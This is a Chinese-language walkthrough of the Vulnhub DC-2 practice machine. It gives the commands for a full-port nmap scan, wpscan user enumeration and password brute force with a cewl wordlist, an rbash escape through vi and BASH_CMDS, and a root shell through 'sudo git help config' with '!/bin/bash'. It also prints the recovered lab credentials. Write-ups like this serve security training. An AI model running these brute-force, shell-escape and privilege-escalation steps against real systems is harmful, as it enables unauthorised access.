Vulnhub靶场----2、DC-2

文章目录

    • 一、环境搭建
    • 二、渗透流程
    • 三、思路总结


一、环境搭建

DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip
kali:192.168.144.148
DC-2:192.168.144.150
添加hosts文件:192.168.144.150 DC-2
Vulnhub靶场----2、DC-2_第1张图片
在这里插入图片描述


二、渗透流程

nmap -A -T5 -sV -sT -p- 192.168.144.150
开放端口:80(web)、 7744(ssh)
Vulnhub靶场----2、DC-2_第2张图片

访问:192.168.144.150

获取到flag1
Vulnhub靶场----2、DC-2_第3张图片

flag1提示需要使用cewl进行暴力破解
进行目录扫描,获取到后台登录地址:http://dc-2/wp-admin
使用wpscan对wordpress用户进行枚举:wpscan --url http://dc-2 -e u
获取到三个用户:admin、jerry、tom
Vulnhub靶场----2、DC-2_第4张图片
利用cewl工具生成密码字典:cewl http://dc-2 -w passwd.txt
在这里插入图片描述
生成用户字典:vim user1.txt
在这里插入图片描述
使用wpscan进行爆破:wpscan --url http://dc-2 -U user1.txt -P passwd.txt
在这里插入图片描述

获取到了jerry:adipiscingtom: parturient,登录后台
Vulnhub靶场----2、DC-2_第5张图片
获取到flag2
Vulnhub靶场----2、DC-2_第6张图片

flag2提示,如果此路不通,尝试另一种方法,尝试7744端口ssh连接
tom登录成功
Vulnhub靶场----2、DC-2_第7张图片

发现flag3
在这里插入图片描述

rbash限制,cat无法执行,vim无法执行,vi可以执行
在这里插入图片描述
Vulnhub靶场----2、DC-2_第8张图片

flag3提示可以尝试切换一下用户
方法一:使用vi突破rbash
vi
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
su jerry
成功切换到jerry
Vulnhub靶场----2、DC-2_第9张图片

成功访问到flag4Vulnhub靶场----2、DC-2_第10张图片

查看是否有可以提权的命令:find / -perm -u=s -type f 2>/dev/null
Vulnhub靶场----2、DC-2_第11张图片

sudo -l:发现git可以利用,flag4也提示了可以使用git
在这里插入图片描述

sudo git help config:进入文本模式
!/bin/bash:获取shell
在这里插入图片描述

获取最后的final-flag.txt
Vulnhub靶场----2、DC-2_第12张图片


三、思路总结

1、nmap端口扫描,添加hosts文件,访问web页面;
2、dirb目录扫描获取后台登录地址;
3、cewl暴力破解获取后台登录账户;
4、ssh远程连接;
5、vi突破rbash切换用户;
6、git提权;

参考链接:https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC2

你可能感兴趣的:(靶场集合,vlunhub,DC-2)